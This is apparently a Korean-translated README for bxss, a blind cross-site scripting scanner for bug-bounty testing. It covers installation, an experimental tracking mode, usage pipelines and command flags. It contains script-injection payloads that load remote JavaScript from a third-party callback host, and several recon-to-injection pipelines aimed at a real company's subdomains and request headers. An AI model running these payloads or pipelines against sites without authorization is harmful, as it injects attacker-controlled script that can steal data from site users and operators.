
Blind XSS Scanner는 웹 애플리케이션에서 블라인드 XSS 취약점을 스캔하는 데 사용할 수 있는 도구입니다.
Bxss는 웹 애플리케이션에서 블라인드 XSS 취약점 탐지를 자동화하는 고성능 블라인드 XSS 스캐너입니다.
저희는 저사양 기기에서 bxss의 성능을 향상시키기 위해 Chromium 기반 워커 풀을 통합하는 작업을 활발히 진행 중입니다.
이 기능은 DOM 기반 XSS 탐지나 트리거 후 페이로드 검사와 같은 리소스 집약적인 작업을 풀을 통해 관리되는 가벼운 Chromium 인스턴스에 오프로드할 수 있도록 합니다. 여러 헤드리스 브라우저 컨텍스트에 워크로드를 통제되고 효율적으로 분산함으로써, bxss는 저사양 기기에서도 응답성과 사용성을 유지할 것입니다.
이를 통해 bxss는 시스템 제약에 관계없이 강력할 뿐만 아니라 높은 접근성을 갖추게 될 것입니다.
go install -v github.com/ethicalhackingplayground/bxss/v2/cmd/bxss@latest
추적 모드는 블라인드 XSS가 트리거된 위치를 추적할 수 있는 실험적 기능입니다. https://xss.report/와 같은 일부 타사 블라인드 XSS 플랫폼에서는 페이로드에 사용자 정의 매개변수를 지정할 수 있습니다. 이를 통해 블라인드 XSS가 트리거된 위치를 추적할 수 있습니다. 예를 들어 페이로드에 url=https://somehost.com 매개변수를 지정하면 도구는 다음 페이로드를 사용합니다.
'"><script src=https://xss.report/c/username?url=https://somehost.com></script>'
테스트 중이며 트리거 시 DOM을 검사하여 블라인드 XSS가 어떤 호스트에서 트리거되었는지 확인할 수 있습니다.
대시보드에서 사용자 정의 매개변수를 할당할 때 url={LINK}를 할당해야 bxss가 자동으로 {LINK}를 실제 URL로 대체할 수 있습니다.
subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-t
subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -a -p '><script src=https://xss.report/c/username></script>' \
-t
subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \
-t
subfinder -d uber.com \
| gau \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "X-Forwarded-For"
echo uber.com \
| haktrails subdomains \
| httpx \
| hakrawler -u \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \
-t
curl -X GET -H "Authorization: Bearer <Token>" \
-H "X-Secret-Key: <Secret>" \
https://dorki.attaxa.com/api/search?q=site:example.com -s \
| jq -r .[][].url \
| grep "&" \
| bxss -a -p '><script src=https://xss.report/c/username></script>'
echo uber.com \
| haktrails subdomains \
| httpx \
| hakrawler -u \
| bxss -a -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \
-t \
-rl 10
고급 도킹 및 취약점 탐색을 위해 Dorki를 확인하고 오늘 가입하세요!
이 도구로 현상금을 받았다면, 커피 한 잔 사주는 것을 고려해주세요!
| 인수 | 설명 | 기본값 |
|---|
-a | 페이로드를 매개변수에 추가 | false |
-c int | 동시성 수준 설정 | 30 |
-H string | 사용자 정의 헤더 설정 | "" |
-hf string | 헤더 파일 경로 | "" |
-p string | 블라인드 XSS 페이로드 | "" |
-pf string | 페이로드 파일 경로 | "" |
-t | 블라인드 XSS 매개변수 테스트 | false |
-X string | 사용할 HTTP 메서드 | "" |
-v | 디버그 모드 활성화 | false |
-rl float | 속도 제한 (초당 요청 수) | 0 |
-f | 리디렉션 따르기 | false |
-l | 추적 모드 활성화 (실험적) | false |